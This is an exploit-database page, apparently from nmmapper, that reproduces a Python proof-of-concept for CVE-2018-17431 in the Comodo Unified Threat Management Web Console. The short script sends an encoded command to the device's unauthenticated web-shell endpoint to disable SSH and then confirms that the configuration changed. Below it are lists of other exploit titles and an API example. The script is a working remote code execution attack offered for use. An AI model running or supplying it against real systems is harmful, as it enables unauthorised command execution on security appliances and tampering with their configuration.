Become a patron and gain access to the dashboard, Schedule scans, API and Search patron

Search for hundreds of thousands of exploits

"Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution"

Author

Exploit author

"Milad Fadavvi"

Platform

Exploit platform

multiple

Release date

Exploit published date

2020-09-22

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
# Exploit Title: Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution
# Date: 2018-08-15
# Exploit Author: Milad Fadavvi
# Author's LinkedIn: https://www.linkedin.com/in/fadavvi/
# Vendor Homepage: https://www.comodo.com/
# Version: Releases before 2.7.0 & 1.5.0 
# Tested on: Windows=Firefox/chrome - Kali=firefox
# PoC & other infos: https://github.com/Fadavvi/CVE-2018-17431-PoC
# CVE : CVE-2018-17431
# CVE-detailes: https://nvd.nist.gov/vuln/detail/CVE-2018-17431
# CVSS 3 score: 9.8 

import requests

def RndInt(Lenght):
    from random import choice
    from string import digits

    RandonInt = ''.join([choice(digits) for n in range(Lenght)])
    return str(RandonInt)

if __name__ == "__main__":

    IP = input("IP: ")
    Port = input("Port: ")

    Command = '%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a' ## Disable SSH
    '''For more info about command try to read manual of spesefic version of Comodo UTM and 
       exploit PoC (https://github.com/Fadavvi/CVE-2018-17431-PoC)
     '''

    BaseURL = "https://" + IP + ":" + Port + "/manage/webshell/u?s=" + RndInt(1) + "&w=" + RndInt(3) +"&h=" + RndInt(2)
    BaseNComdURL = BaseURL + "&k=" + Command
    LastPart = "&l=" + RndInt(2) +"&_=" + RndInt(13) 
    FullURL = BaseNComdURL + LastPart
    AddetionalEnter = BaseURL + "&k=%0a" + LastPart

    try:
        FirstResponse = requests.get(FullURL).text
    except:
        print('\nExploit failed due HTTP Error. Check given URL and Port!\n')
        exit(1)
    
    SecondResponse = requests.get(AddetionalEnter).text
    if SecondResponse.find("Configuration has been altered") == -1:
        print("\nExploit Failed!\n")
        exit(1)
    else:
        print("\nOK! Command Ran!\n")
    exit(0)
Release Date Title Type Platform Author
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
Release Date Title Type Platform Author
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
2020-12-02 "EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Stored Cross Site Scripting" webapps multiple "Soushikta Chowdhury"
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF" webapps multiple "Hardik Solanki"
2020-12-02 "Student Result Management System 1.0 - Authentication Bypass SQL Injection" webapps multiple "Ritesh Gohil"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass" webapps multiple "Aakash Madaan"
Release Date Title Type Platform Author
2020-09-22 "Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution" webapps multiple "Milad Fadavvi"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48825/?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.